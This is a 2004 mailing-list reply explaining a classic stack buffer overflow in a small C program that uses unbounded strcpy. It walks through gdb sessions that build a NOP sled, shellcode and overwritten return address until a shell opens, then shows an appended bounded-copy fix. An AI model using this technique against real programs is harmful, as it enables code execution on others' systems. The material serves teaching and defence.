Security Basics: Re: Buffer Overflow problem

Re: Buffer Overflow problem

From: Krzysztof Godlewski <kgodlewski_at_interia.pl>
Date: Fri, 7 May 2004 18:13:52 +0200

On Wed, 5 May 2004 08:14, John Vill wrote:
> Hello, I'm new to this list and I was hoping someone can help me.
>
> #include <string.h>
>
> int main(int argc, char **argv) {
>     char buf[256];
>
>     strcpy(buf, argv[1]);   /* unbounded copy: the overflow under discussion */
> }

Hello,

The problem is incorrect padding. I'll try explaining, but keep in mind that
I'm very far from being an expert...

On my system buf has addr 0xbffff4a0. When I run the prog like this:

Starting program: /home/kg/prog/sec/buf `perl -e 'print "\x90"x222'``./mkshell.pl``perl -e 'print "\xa0\xf4\xff\xbf"'`

I get:

Program received signal SIGSEGV, Segmentation fault.
0x00bffff4 in ?? ()

So I'm just one byte off from the correct location. Examining the stack proves
that this is true:

(gdb) x/4x $esp - 8
0xbffff5a8: 0xa068732f 0x00bffff4 0x00000002 0xbffff5f4
(gdb)

The value 0xa068732f just before the return addr holds the missing part of my
buffer's address. So all you have to do is move the entire address by one
byte. So...

Starting program: /home/kg/prog/sec/buf `perl -e 'print "\x90"x223'``./mkshell.pl``perl -e 'print "\xa6\xf4\xff\xbf"'`

sh-2.05b$

... it works.

A good idea is to write more than one return address on the stack, so you
don't have to be so exact in calculating location. You just have to remember
to jump somewhere inside the buffer. In my case, I changed the return address
to 0xbffff4a9. Now:

Starting program: /home/kg/prog/sec/buf `perl -e 'print "\x90"x220'``./mkshell.pl``perl -e 'print "\xa9\xf4\xff\xbf"x30'`

Program received signal SIGSEGV, Segmentation fault.
0xfff4a9bf in ?? ()
(gdb)

You can see there's my address on the stack, it's just incorrectly aligned. We
can fix this by adding 1 to 3 bytes of padding:

Starting program: /home/kg/prog/sec/buf AAA`perl -e 'print "\x90"x220'``./mkshell.pl``perl -e 'print "\xa9\xf4\xff\xbf"x30'`

sh-2.05b$

This approach is more likely to work, as it leaves more room for mistakes.

I hope that helps.

Krzysztof Godlewski
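For comparison, here is the bounded copy that removes the overflow in John's program, so that none of the padding and alignment arithmetic above applies. This is an added example, not code from either poster; the function names and the choice to reject an oversized argument rather than silently truncate it are assumptions made here.

```c
/* Added example: bounded replacement for the strcpy() in the quoted program.
 * Function names and the reject-instead-of-truncate policy are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 256   /* same buffer size as the original program */

/* Copy src into dst only if it fits together with its terminator.
 * Returns 0 on success, -1 (leaving dst empty) if it would overflow.
 * The original strcpy() wrote strlen(src)+1 bytes regardless of dst_size. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0)
        return -1;
    if (len >= dst_size) {       /* no room for the NUL: reject, do not overflow */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);   /* len + 1 copies the terminator too */
    return 0;
}

/* Try a run of n 'A' bytes against a BUF_SIZE stack buffer.
 * Returns the number of bytes accepted, or -1 if the copy was refused. */
int accepted_run_length(size_t n)
{
    char buf[BUF_SIZE];
    char *src = malloc(n + 1);
    int result = -1;
    if (src == NULL)
        return -1;
    memset(src, 'A', n);
    src[n] = '\0';
    if (copy_bounded(buf, sizeof buf, src) == 0)
        result = (int)strlen(buf);
    free(src);
    return result;
}

int main(int argc, char **argv)
{
    char buf[BUF_SIZE];
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    if (copy_bounded(buf, sizeof buf, argv[1]) != 0) {
        fprintf(stderr, "argument of %zu bytes rejected (limit %d)\n",
                strlen(argv[1]), BUF_SIZE - 1);
        return 2;
    }
    printf("copied %zu bytes\n", strlen(buf));
    return 0;
}
```

Run with the 255-byte-or-longer arguments from the session above and the program exits with a diagnostic instead of a SIGSEGV; building with -fstack-protector additionally turns any overflow that slips past a check into an abort rather than a hijacked return.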

Received on May 07 2004
